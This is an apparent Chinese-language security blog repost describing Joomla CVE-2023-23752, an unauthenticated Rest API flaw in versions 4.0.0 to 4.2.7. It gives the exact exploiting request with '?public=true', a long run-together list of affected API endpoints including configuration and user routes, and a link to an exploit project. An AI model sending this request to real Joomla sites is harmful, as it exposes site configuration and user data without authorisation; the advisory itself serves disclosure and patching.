Joomla (CVE-2023-23752) - 请求参数突破 Rest API
2023-2-22 14:21:38 Author: Ots安全(查看原文) 阅读量:14 收藏

CVE-2023-23752 核模板

Joomla (CVE-2023-23752) - 请求参数突破 Rest API

受影响的版本

Joomla大致有3个路由入口,分别是

  1. 根目录下的index.php(用户访问文章)

  2. 根目录下的administrator/index.php(管理员管理)

  3. 根目录下的api/index.php(开发者的Rest API)

非授权接口正是第三个入口点。因此,只有Joomla4.0.0 Joomla4.2.7受到影响(Rest API 4.x是官方开发的)

在这里发送请求

http://x.x.x.x/api/index.php/v1/banners?public=true

其他损坏的API如下

v1/bannersv1/banners/:idv1/bannersv1/banners/:idv1/banners/:idv1/banners/clientsv1/banners/clients/:idv1/banners/clientsv1/banners/clients/:idv1/banners/clients/:idv1/banners/categoriesv1/banners/categories/:idv1/banners/categoriesv1/banners/categories/:idv1/banners/categories/:idv1/banners/:id/contenthistoryv1/banners/:id/contenthistory/keepv1/banners/:id/contenthistoryv1/config/applicationv1/config/applicationv1/config/:component_namev1/config/:component_namev1/contacts/form/:idv1/contactsv1/contacts/:idv1/contactsv1/contacts/:idv1/contacts/:idv1/contacts/categoriesv1/contacts/categories/:idv1/contacts/categoriesv1/contacts/categories/:idv1/contacts/categories/:idv1/fields/contacts/contactv1/fields/contacts/contact/:idv1/fields/contacts/contactv1/fields/contacts/contact/:idv1/fields/contacts/contact/:idv1/fields/contacts/mailv1/fields/contacts/mail/:idv1/fields/contacts/mailv1/fields/contacts/mail/:idv1/fields/contacts/mail/:idv1/fields/contacts/categoriesv1/fields/contacts/categories/:idv1/fields/contacts/categoriesv1/fields/contacts/categories/:idv1/fields/contacts/categories/:idv1/fields/groups/contacts/contactv1/fields/groups/contacts/contact/:idv1/fields/groups/contacts/contactv1/fields/groups/contacts/contact/:idv1/fields/groups/contacts/contact/:idv1/fields/groups/contacts/mailv1/fields/groups/contacts/mail/:idv1/fields/groups/contacts/mailv1/fields/groups/contacts/mail/:idv1/fields/groups/contacts/mail/:idv1/fields/groups/contacts/categoriesv1/fields/groups/contacts/categories/:idv1/fields/groups/contacts/categoriesv1/fields/groups/contacts/categories/:idv1/fields/groups/contacts/categories/:idv1/contacts/:id/contenthistoryv1/contacts/:id/contenthistory/keepv1/contacts/:id/contenthistoryv1/content/articlesv1/content/articles/:idv1/content/articlesv1/content/articles/:idv1/content/articles/:idv1/content/categoriesv1/content/categories/:idv1/content/categoriesv1/content/categories/:idv1/content/categories/:idv1/fields/content/articlesv1/fields/content/articles/:idv1/fields/content/articlesv1/fields/content/articles/:idv1/fields/content/articles/:idv1/fields/content/categoriesv1/fields/content/categories/:idv1/fields/content/categoriesv1/fields/content/categories/:idv1/fields/content/categories/:idv1/fields/groups/content/articlesv1/fields/groups/content/articles/:idv1/fields/groups/content/articlesv1/fields/groups/content/articles/:idv1/fields/groups/content/articles/:idv1/fields/groups/content/categoriesv1/fields/groups/content/categories/:idv1/fields/groups/content/categoriesv1/fields/groups/content/categories/:idv1/fields/groups/content/categories/:idv1/content/articles/:id/contenthistoryv1/content/articles/:id/contenthistory/keepv1/content/articles/:id/contenthistoryv1/extensionsv1/languages/contentv1/languages/content/:idv1/languages/contentv1/languages/content/:idv1/languages/content/:idv1/languages/overrides/searchv1/languages/overrides/search/cache/refreshv1/languages/overrides/site/zh-CNv1/languages/overrides/site/zh-CN/:idv1/languages/overrides/site/zh-CNv1/languages/overrides/site/zh-CN/:idv1/languages/overrides/site/zh-CN/:idv1/languages/overrides/administrator/zh-CNv1/languages/overrides/administrator/zh-CN/:idv1/languages/overrides/administrator/zh-CNv1/languages/overrides/administrator/zh-CN/:idv1/languages/overrides/administrator/zh-CN/:idv1/languages/overrides/site/en-GBv1/languages/overrides/site/en-GB/:idv1/languages/overrides/site/en-GBv1/languages/overrides/site/en-GB/:idv1/languages/overrides/site/en-GB/:idv1/languages/overrides/administrator/en-GBv1/languages/overrides/administrator/en-GB/:idv1/languages/overrides/administrator/en-GBv1/languages/overrides/administrator/en-GB/:idv1/languages/overrides/administrator/en-GB/:idv1/languagesv1/languagesv1/media/adaptersv1/media/adapters/:idv1/media/filesv1/media/files/:path/v1/media/files/:pathv1/media/filesv1/media/files/:pathv1/media/files/:pathv1/menus/sitev1/menus/site/:idv1/menus/sitev1/menus/site/:idv1/menus/site/:idv1/menus/administratorv1/menus/administrator/:idv1/menus/administratorv1/menus/administrator/:idv1/menus/administrator/:idv1/menus/site/itemsv1/menus/site/items/:idv1/menus/site/itemsv1/menus/site/items/:idv1/menus/site/items/:idv1/menus/administrator/itemsv1/menus/administrator/items/:idv1/menus/administrator/itemsv1/menus/administrator/items/:idv1/menus/administrator/items/:idv1/menus/site/items/typesv1/menus/administrator/items/typesv1/messagesv1/messages/:idv1/messagesv1/messages/:idv1/messages/:idv1/modules/types/sitev1/modules/types/administratorv1/modules/sitev1/modules/site/:idv1/modules/sitev1/modules/site/:idv1/modules/site/:idv1/modules/administratorv1/modules/administrator/:idv1/modules/administratorv1/modules/administrator/:idv1/modules/administrator/:idv1/newsfeeds/feedsv1/newsfeeds/feeds/:idv1/newsfeeds/feedsv1/newsfeeds/feeds/:idv1/newsfeeds/feeds/:idv1/newsfeeds/categoriesv1/newsfeeds/categories/:idv1/newsfeeds/categoriesv1/newsfeeds/categories/:idv1/newsfeeds/categories/:idv1/pluginsv1/plugins/:idv1/plugins/:idv1/privacy/requestsv1/privacy/requests/:idv1/privacy/requests/export/:idv1/privacy/requestsv1/privacy/consentsv1/privacy/consents/:idv1/privacy/consents/:idv1/redirectsv1/redirects/:idv1/redirectsv1/redirects/:idv1/redirects/:idv1/tagsv1/tags/:idv1/tagsv1/tags/:idv1/tags/:idv1/templates/styles/sitev1/templates/styles/site/:idv1/templates/styles/sitev1/templates/styles/site/:idv1/templates/styles/site/:idv1/templates/styles/administratorv1/templates/styles/administrator/:idv1/templates/styles/administratorv1/templates/styles/administrator/:idv1/templates/styles/administrator/:idv1/usersv1/users/:idv1/usersv1/users/:idv1/users/:idv1/fields/usersv1/fields/users/:idv1/fields/usersv1/fields/users/:idv1/fields/users/:idv1/fields/groups/usersv1/fields/groups/users/:idv1/fields/groups/usersv1/fields/groups/users/:idv1/fields/groups/users/:idv1/users/groupsv1/users/groups/:idv1/users/groupsv1/users/groups/:idv1/users/groups/:idv1/users/levelsv1/users/levels/:idv1/users/levelsv1/users/levels/:idv1/users/levels/:id

项目地址:https://github.com/Saboor-Hakimi/CVE-2023-23752


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247496615&idx=3&sn=d584daf23bc94bc66c4f65c89169235f&chksm=9badbaecacda33fae3c56198787a6c54968bd5e2db32e7fa2d2fbdc72c9add180db4197533e8#rd
如有侵权请联系:admin#unsafe.sh